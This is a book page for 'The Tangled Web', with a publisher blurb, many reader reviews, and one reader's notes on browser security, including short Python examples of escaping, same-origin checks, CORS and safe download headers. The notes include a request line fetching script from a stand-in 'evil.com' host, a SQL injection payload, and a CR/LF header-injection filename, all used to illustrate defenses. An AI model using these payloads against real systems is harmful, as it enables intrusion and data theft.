"Thorough and comprehensive coverage from one of the foremost experts in browser security."
—Tavis Ormandy, Google Inc.
Modern web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidently navigate this landscape.
In The Tangled Web, Michal Zalewski, one of the world's top browser security experts, offers a compelling narrative that explains exactly how browsers work and why they're fundamentally insecure. Rather than dispense simplistic advice on vulnerabilities, Zalewski examines the entire browser security model, revealing weak points and providing crucial information for shoring up web application security. You'll learn how to:
- Perform common but surprisingly complex tasks such as URL parsing and HTML sanitization
- Use modern security features like Strict Transport Security, Content Security Policy, and Cross-Origin Resource Sharing
- Leverage many variants of the same-origin policy to safely compartmentalize complex web applications and protect user credentials in case of XSS bugs
- Build mashups and embed gadgets without getting stung by the tricky frame navigation policy
- Embed or host user-supplied content without running into the trap of content sniffing
For quick reference, "Security Engineering Cheat Sheets" at the end of each chapter offer ready solutions to problems you're most likely to encounter. With coverage extending as far as planned HTML5 features, The Tangled Web will help you create secure web applications that stand the test of time.
A bit dated, like any seven-year-old web-related book. I picked it up to get a good grasp of the definition and impact of things like XSS, XSRF, header splitting, etc.
Most of the book is still relevant, but some things should be revalidated since they may be deprecated, like XDomainRequest.
What I like about these older web books is that they're an easy read: with a bit of knowledge of some of the concepts, getting a deeper understanding is straightforward.
Notes
It Starts with a URL
- scheme://login:pwd@address:port/path?search#fragment
- The protocol and // signal an absolute URL.
- Pseudo-protocols:
  * view-source:http://...
  * data:text/plain,somePage,inlineDocument
- Transfer-Encoding: chunked (for transmitting stream data without specifying Content-Length).
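To make the URL anatomy above concrete, here is a minimal sketch using Python's standard `urllib.parse`. The URL itself is made up for illustration, and a browser's own parser may well disagree with this one on malformed input, which is a large part of the book's point.

```python
from urllib.parse import urlsplit

# Hypothetical URL, invented only to show every component at once.
url = "https://alice:s3cret@example.com:8443/docs/index.html?q=tangled#notes"
parts = urlsplit(url)

print("scheme:  ", parts.scheme)
print("login:   ", parts.username)
print("password:", parts.password)
print("address: ", parts.hostname)
print("port:    ", parts.port)
print("path:    ", parts.path)
print("search:  ", parts.query)
print("fragment:", parts.fragment)
```

The fragment is kept by the client and is not sent to the server, so server-side code never sees it.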
HTTP
- HttpOnly: cookie attribute to prevent reading from document.cookie.
- secure: only send the cookie over HTTPS.
  * If not set, even if https://site.com sets a cookie, an attacker can just wait for you to go to http://otherSite.com, inject a frame, point it to http://site.com, intercept the plaintext request and grab the cookie.
- HTTP request:
  * First line: method - path - version
  * Headers, one per line, each ending with a CR/LF
  * Request body starts after the empty line.
- HTTP response:
  * First line: version - response code - response keyword
  * Headers and payload follow the same structure as the request.
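The request layout and the two cookie flags above can be sketched in a few lines of Python. This is a deliberately naive illustration, not a compliant HTTP parser: `parse_request` is a hypothetical helper, the request bytes are invented, and real servers have to handle many edge cases it ignores.

```python
from http.cookies import SimpleCookie


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into its first line, headers and body."""
    # The empty line (CR/LF CR/LF) separates the headers from the body.
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    # First line: method - path - version.
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body


# Hypothetical request, for illustration only.
raw = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: site.example\r\n"
    b"Content-Length: 9\r\n"
    b"\r\n"
    b"user=jane"
)
method, path, version, headers, body = parse_request(raw)
print(method, path, version, headers, body)

# A session cookie that scripts cannot read and that is only sent over HTTPS.
cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["secure"] = True
cookie["session"]["httponly"] = True
set_cookie_line = cookie.output()
print(set_cookie_line)
```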
HTML
- &, <, >, ', " should be escaped.
- Named entities: &gt; equals > and &amp; equals ampersand (for encoding/obfuscating characters, including in attributes).
- Documents not loaded through HTTP lack headers, causing browsers to improvise things like MIME type and charset.
  * Something like this might help sometimes.
  * But some may never work because it's too late in the rendering process, like changing the document type.
- A hyperlink's target view might get access denied and open in a new window (same-origin maybe?).
  * Possible values: _top, _parent, _blank, [a name].
- Forms with no action param get submitted to the document location.
  * Forms with the GET method are submitted with the named fields as the query string; plus signs are encoded as "%2B" and spaces are replaced by a plus sign: /action?field=name+lastname&four=two%2Btwo.
  * For POST the default is to include params as the request payload or body (application/x-www-form-urlencoded).
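Both the escaping rule and the form-encoding rule above are easy to try with Python's standard library. This is only a sketch: the sample strings are made up, and `html.escape` covers the basic text and quoted-attribute cases, not every context a template can put data into.

```python
from html import escape
from urllib.parse import urlencode

# Escape the five characters from the notes: & < > ' "
untrusted = "<a href='x'>Tom & \"Jerry\"</a>"
escaped = escape(untrusted, quote=True)
print(escaped)

# Encode form fields the way a GET form submission does:
# spaces become "+", and a literal plus sign becomes "%2B".
fields = {"field": "name lastname", "four": "two+two"}
query = urlencode(fields)
print("/action?" + query)
```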
CSS
- @charset sets the css file charset.
Content Isolation Logic
- Same-origin is based on DNS, not IP.
  * Susceptible to DNS rebinding: intentionally pointing DNS to a new IP.
  * Browsers try to mitigate by caching DNS lookups.
- Remove the subdomain from document.domain to relax same-origin.
  * document.domain doesn't work for XHR.
- Content-Length: payload length header, which is always set by the browser.
  * If it could be overwritten through XHR, a second request could be smuggled through on keep-alive sessions as part of the first request's body.
  * So most browsers prevent modifying some headers: Content-Length, Referer, User-Agent, Cookie, Origin.
- The TRACE HTTP verb is banned almost everywhere; it is used for debugging and allows you to trace request hops.
- Servers still support HTTP 0.9, a one-liner protocol that is easy to exploit.
  * GET\thttp://evil.com/evil.js\n\n
  * or also: GET\thttp://evil.com/evil.js\tHTTP/1.0\n\n
- Cookies are set for the domain param (and any subdomain starting from there) and the path.
- At some point you could access HttpOnly cookies through XHR: req.getResponseHeader('Set-Cookie'); this may still be possible.
- Cookies can be overwritten from non-HTTPS, non-HttpOnly or non-secure parts of your site.
- Cookies don't include the protocol.
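As a rough illustration of the first point, a same-origin check compares the scheme, host name and port as written in the URL, without resolving the name to an IP. The sketch below is a simplification under that assumption: `origin` and `same_origin` are hypothetical helpers, and real browsers add special cases (document.domain, non-HTTP schemes) that are not modeled here.

```python
from urllib.parse import urlsplit

# Default ports, used when the URL does not spell one out.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url: str):
    """Return the (scheme, host, port) tuple that identifies the origin."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


def same_origin(a: str, b: str) -> bool:
    return origin(a) == origin(b)


# Same scheme, host and (default) port: same origin.
print(same_origin("http://example.com/a", "http://example.com:80/b"))
# Different scheme: different origin.
print(same_origin("http://example.com/", "https://example.com/"))
# The comparison uses the name, so an IP literal never matches a host name,
# even if DNS currently points the name at that address.
print(same_origin("http://example.com/", "http://192.0.2.10/"))
```

Because the comparison is by name, changing what the name resolves to (DNS rebinding) does not change the origin, which is why the notes list it as a weakness.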
Outside of Same-Origin
- X-Frame-Options (DENY or SAMEORIGIN): prevents the page from being framed, so it cannot be tampered with through things like click hijacking or phishing.
- To mitigate keystroke redirection, browsers prevent a focus switch while a key is being pressed.
  * It doesn't work completely because attackers can roughly predict which keys will be pressed next, and when, based on the English language, and so make the focus switch at the right time.
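Sending the header is a one-line change on the server. Here is a minimal sketch as a bare WSGI application; the `app` function and the page body are invented for illustration, and in practice a framework or the web server configuration would usually set this header.

```python
def app(environ, start_response):
    """Tiny WSGI app that refuses to be rendered inside any frame."""
    body = b"<h1>Account settings</h1>"
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Length", str(len(body))),
        # DENY blocks all framing; SAMEORIGIN would allow same-origin frames.
        ("X-Frame-Options", "DENY"),
    ]
    start_response("200 OK", headers)
    return [body]


# Call the app directly with a stub start_response to inspect the headers.
captured = {}


def fake_start_response(status, headers):
    captured["status"] = status
    captured["headers"] = dict(headers)


response_body = b"".join(app({}, fake_start_response))
print(captured["status"], captured["headers"])
```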
Other Browser Boundaries
- 3 types of URL schemes.
  * Unrestricted: HTTP, HTTPS, FTP.
  * Partly restricted: file:, data:, javascript:.
  * Restricted: about:, res:, chrome: (cannot be navigated to under any circumstance).
- Third-party cookies are used by ad sites to tag users.
Content Recognition
- Content sniffing: if Content-Type is missing, browsers will try to guess the resource type based on heuristics like the extension or payload inspection.
  * The HTTP specification permits sniffing only in the absence of the header.
  * For malformed MIME types, browsers may still use sniffing.
- X-Content-Type-Options: nosniff.
- Content-Disposition: attachment (may trigger a download dialog box).
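Put together, serving a user-supplied file might use headers along these lines. This is a sketch under stated assumptions: `download_headers` is a hypothetical helper, the generic `application/octet-stream` type is just one conservative choice, and the file name filter is intentionally crude.

```python
def download_headers(filename: str, size: int) -> list:
    """Build response headers for serving an untrusted upload as a download."""
    # Keep only harmless characters so the name cannot break out of the
    # quoted string or smuggle CR/LF into the header block.
    safe = "".join(c for c in filename if c.isalnum() or c in "._-") or "download"
    return [
        # Always send an explicit type so the browser has no reason to guess.
        ("Content-Type", "application/octet-stream"),
        ("Content-Length", str(size)),
        # Ask the browser not to second-guess the declared type.
        ("X-Content-Type-Options", "nosniff"),
        # Ask the browser to save the file rather than render it inline.
        ("Content-Disposition", f'attachment; filename="{safe}"'),
    ]


for name, value in download_headers('evil"\r\nX: y.html', 10):
    print(f"{name}: {value}")
```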
New Features
- Simple CORS requests only allow GET, POST and HEAD.
  * Response headers must include Access-Control-Allow-Origin (can use the wildcard "*").
  * This origin must be the same as the Origin header of the request.
  * For non-simple requests, browsers may do a handshake first by sending an OPTIONS preflight request to see if the request is allowed.
    ^ This can be cached.
- Content Security Policy (CSP): for controlling what can be loaded with the src attribute.
  * X-Content-Security-Policy
  * X-Content-Security-Policy-Report-Only: warning only, without failing HTTP requests.
- Sandboxed frames: allow you to control, through a policy, the content displayed and loaded by embedded frames.
  * allow-scripts, allow-forms, etc.
- HSTS or STS (HTTP Strict Transport Security): stops browsers from first navigating to the non-HTTPS version of a site and only then being redirected to HTTPS, which would let the first request go unencrypted.
  * Strict-Transport-Security: max-age=30000; includeSubDomains
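The server side of the CORS exchange described above can be sketched as a small decision function. Everything here is an assumption made for illustration: the allowlist, the method set, the 600-second cache lifetime and the `cors_headers` helper are not from the book.

```python
# Hypothetical policy: which origins and methods this server accepts.
ALLOWED_ORIGINS = {"https://app.example.com"}
ALLOWED_METHODS = {"GET", "POST", "HEAD", "PUT"}


def cors_headers(origin, method="GET", preflight=False):
    """Return the CORS response headers, or {} if the request is not allowed."""
    if origin not in ALLOWED_ORIGINS or method not in ALLOWED_METHODS:
        # No Access-Control-Allow-Origin header: the browser withholds the
        # response from the calling script.
        return {}
    headers = {
        # Echo the request's Origin instead of using the "*" wildcard.
        "Access-Control-Allow-Origin": origin,
        "Vary": "Origin",
    }
    if preflight:
        # Answer to the OPTIONS handshake; Max-Age lets the browser cache it.
        headers["Access-Control-Allow-Methods"] = ", ".join(sorted(ALLOWED_METHODS))
        headers["Access-Control-Max-Age"] = "600"
    return headers


print(cors_headers("https://app.example.com"))
print(cors_headers("https://app.example.com", "PUT", preflight=True))
print(cors_headers("https://evil.example"))
```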
Common Vulnerabilities
- Cross-site request forgery (XSRF / CSRF)
  * making requests to the server while impersonating the user's client.
- Cross-site script inclusion (XSSI)
  * loading JSON-like responses through script tags.
- Cross-site scripting (XSS)
  * non-escaped inputs allowing attackers to plant HTML or scripts on your site.
- Header injection or response splitting.
- HTTP downgrade
- Cache poisoning
- Cookie injection
- Network fenceposts: with the help of DNS rebinding, an attacker may be able to see responses to all server requests.
- Vulnerabilities on the server:
  * Buffer overflow
  * Command injection, such as SQL injection
  * Directory traversal
  * File inclusion
  * Format-string: allows attackers to plant a string into a formatting function like printf().
  * Integer overflow
  * Pointer management
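Of the server-side items, SQL injection is the easiest to show in a few lines. The sketch below uses an in-memory SQLite database with made-up table contents; it contrasts a query built by string formatting with a parameterized one, which is the usual fix rather than anything specific to this book.

```python
import sqlite3

# Throwaway in-memory database with invented rows.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "a-secret"), ("bob", "b-secret")],
)

# Attacker-controlled input that closes the quote and adds an always-true test.
payload = "nobody' OR '1'='1"

# Vulnerable: the input is pasted into the SQL text and changes its meaning.
unsafe_sql = f"SELECT secret FROM users WHERE name = '{payload}'"
leaked = conn.execute(unsafe_sql).fetchall()

# Safer: the input is passed as a bound parameter and stays plain data.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (payload,)
).fetchall()

print("string formatting returned", len(leaked), "rows")
print("parameterized query returned", len(safe), "rows")
```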
Read it about twice. Not bad for getting an idea of the client side and the browser's holes, but for web app pentesting in general it might not help a lot. I'd still suggest reading it, especially for those who are already done with the classic web vulnerabilities and need a deeper look at the browser side. I would classify it in the same category as "The Browser Hacker's Handbook", but to be honest there are some nice tricks and notes regarding web technologies in this book, and that's why I am giving it 3*.
Considering that the OWASP Top Ten lists the same or similar security issues even after a decade, The Tangled Web is still a worthwhile read, keeping in mind that most of the specifics are very much outdated.
I’ve been interested in IT security for a long time, but obviously even more so since I started working professionally in this area. Since web applications have become ubiquitous in recent years, they constitute a big part of our penetration testing work. This is a very broad topic, so The Tangled Web: A Guide to Securing Modern Web Applications by Michal Zalewski is an ambitious project.
The first thing I noticed was that the book is comparatively thin. At around 300 pages it’s only about one third of The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws. Don’t let that fool you though, this book is not a lightweight by any means. It’s logically structured in three parts, the first of which explores the various components that constitute the web as we know it today (URLs, HTTP, HTML, CSS etc.) and their security implications. This is followed by a look at the security features — and their shortcomings — of current browsers. After this part 3 deals with current developments and the future of browser and web application security. This is rounded off by a list of common security problems including references to the chapters of the book that cover them, as well as an epilogue with a surprisingly philosophical outlook on IT security and trust in human societies.
The writing was clear and to the point, with tons of footnotes and references to provide the interested reader with the chance to further research the presented topics. The author clearly knows what he’s talking about and manages to present it in a very approachable way. Due to its limited size the book still has to be a bit dense though, so I never really felt like reading more than one chapter at a time, otherwise it’d have been too much information to take in at once.
Whether you work in IT security or are a web application developer, this definitely is a book you don’t want to miss.
The Tangled Web: A Guide to Securing Modern Web Applications is a fairly solid introduction to computer security in the context of web sites/browsers with one fairly major downside: it was published 7 years ago. In the context of the Internet, that's... quite a while.
When this book was published, IE had a 40% market share, followed by Firefox with 30%, and Chrome with only 20%. Given that more recent numbers show Chrome with 70%, FF with 10%, and IE + Edge together only at 10%... the Internet has changed. Since it was published, Flash is the next best thing to dead. HSTS and CORS are everywhere now (mentioned as future technologies in the book). Some issues just ... aren't any more, while a whole new kettle of worms is about.
That being said, it's actually a pretty decent introductory book. Some things never change. The internet is still driven by URLs and cookies, and even the introduction of HTTP/2 and HTTP/3 doesn't change things that much. For the most part HTML is still HTML (although HTML4/XHTML issues are less relevant than they used to be). Even with CORS, SOP is still an issue, as are content types.
So really... you could do worse if you're interested in learning a bit about computer security. Especially if you picked this book up as part of a Humble Bundle. :)
Shows the numerous ways in which the web has failed in terms of security. More importantly, the book shows the reasons why these problems have occurred.
Even though some of the discussed problems have been mitigated during the years, and there are more secure methods available, the book is still very interesting, and some of the attacks are still relevant.
Some of the basics are still relevant today, but the vast majority has since been adjusted or edited; well, the book was published in 2012 (I got my hands on the Polish version from 2012). I stopped reading it somewhere in the middle. I have a feeling lots of things are extremely dated, and fairly so (for example, there is info on Internet Explorer and Flash, dead as of Jan 2021). But still, if you come across it, it is a fine read.
I got through maybe 1/4 of this book, then skimmed the rest for takeaways. What I got was great, and I will keep it around as a reference. Recommended. Although dense, I could get through half a chapter at a time before I felt like I was on information overload. For a technical book, that is pretty great.
Very detailed overview of web browser design and security. Will be dated soon, but for now, is the best resource of its kind. I'm still amazed that the web can be so exploitable, yet work so well.
Even accounting for the fact that this came out a while ago and the web is a fast-moving target, this is not a good book.
I have a background in developing web applications on both the server and the front end, so I feel like I ought to be able to get something out of this. But the book has a pattern of going on for a long time into internet basics that I'm already familiar with, then suddenly dives into particular vulnerabilities that are so poorly explained that I can't tell whether they're happening on the server or the browser, why they're a problem, or what someone might do about them.
I put this book down at 17% when it asserted that GET and POST are basically interchangeable; if it's making that kind of oversimplification of things I know, I don't trust it to tell me about anything else.
Needs an update for sure, but quite enjoyable still. The tongue-in-cheek intro about academics looking into web security was quite funny. Definitely protested inside "but they really are manifestations of the confused deputy problem"!
"Part of the problem is that said experts have long been dismissive of the whole web security ruckus, unable to understand what it was all about. They have been quick to label web security flaws as trivial manifestations of the confused deputy problem[1] or of some other catchy label outlined in a trade journal three decades ago. And why should they care about web security, anyway?"
This can perhaps be boiled down to "user-generated content is hard."
But really: decently interesting read, though definitely in more of a reference format than Silence on the Wire. I learned a few new things, and would definitely come back if building a site with user accounts. Yes, at six years old some parts are getting a little dated (IE6 security problems aren't that much of a burden, thankfully), but it's not like XSS isn't an issue these days.
A great read about Cross-Site Request Forgery and other exploits that a developer should be aware of when developing for the web. A lot of the techniques he describes have since been patched, but it is cool to note that they were once problematic. Novice web developers and web designers should be aware of these problems before developing. I highly recommend reading it through once.
Fantastic overview of modern-ish web applications, as well as the history of how we got here. While it doesn't go into detail about modern frameworks, it does go into detail on the entire hacking process from loading a URL to HTML parsing to content security policies.
Introductions to cybersecurity and application security in general are hard to find. The Tangled Web has stayed relevant, and the content is relatively consumable by newbs.
I guess this book was legendary 10-15 years ago, but it is not really a book to read in 2021; most of the things mentioned are either obsolete or dead technologies.
This was the first book I've read about web security, recommended by a fellow who lectured on the subject at our company. It wasn't organized exactly how I expected, but I think that was a good thing. I was expecting the book to list the vulnerabilities outlined in OWASP one by one, explaining what they are and how to prevent them. However, those were not discussed until at the very end of the book. Instead, the bulk of the book was really about understanding every little piece of the puzzle that makes the web, the browsers and the servers communicate and work. It started from HTTP mechanics, onto HTML quirks, CSS, Javascript... all these little pieces were covered.
The aim of the book, as I see it, was to make the reader first understand how the web works. In each chapter security issues were discussed basically related to the topics discussed in that chapter, while linking it, from time to time, to the big picture, which is, basically, the OWASP list of vulnerabilities.
So, while the book was not organized the way I expected, I really ended up liking the way it is now. I now know a lot more about each component of the web, which helps me understand the security issues better. This book is also remarkable in the sense that it doesn't waste time on irrelevant issues: I felt that every page and every chapter contained information that is useful. The writing style was very consistent and to the point.
Awesome book, a joy to read. It's dense, but written in a cheerful tone. The author knows a lot about web security. It's not bound to a narrow set of technologies, frameworks, OSes or browsers. It touches a little bit of everything, but that doesn't make it shallow. I wasn't aware of 90% of the information presented in this book. It has none of the cumbersome and useless terms security charlatans like. It's very practical and full of advice.
I felt slightly uncomfortable because it was written around 2011. Some facts are clearly outdated (Flash is dead in 2019), some "things to come" became a bedrock of the modern web (CORS). At the same time I was glad it mentions those outdated facts. It provides historical perspective so you can see why the web works like this. For example, it has an explanation why "Download/Open" buttons have such a weird and annoying delay.
Excellent source for browser and web application related security features. Underlines the current reality that the web app environment is (too) complex and full of features that are easy to forget, misconfigure or overlook. I must admit that I just browsed parts of the book because of its technicality, but this is a keeper in case I need to check some nitty-gritty details of browsers, web protocols, plugins, JavaScript, etc.
The book also has a chapter on planned new security features. It mentions that the dream of inventing a brand-new browser security model is strong within the community, but that it would require rebuilding the entire web. Therefore the practical work focuses on humble extensions, which unfortunately increases the complexity of the security-critical sections of the browser's code.
A really important read for anyone working on web front-ends in 2015. Great overview of a ton of major issues and concerns, including a bunch of stuff that less-technical folk (like product owners) would benefit from knowing, particularly when it comes to thinking through test scenarios in highly-stringent environments (e.g., where PCI compliance is a concern). Very thorough and complete without being obtuse.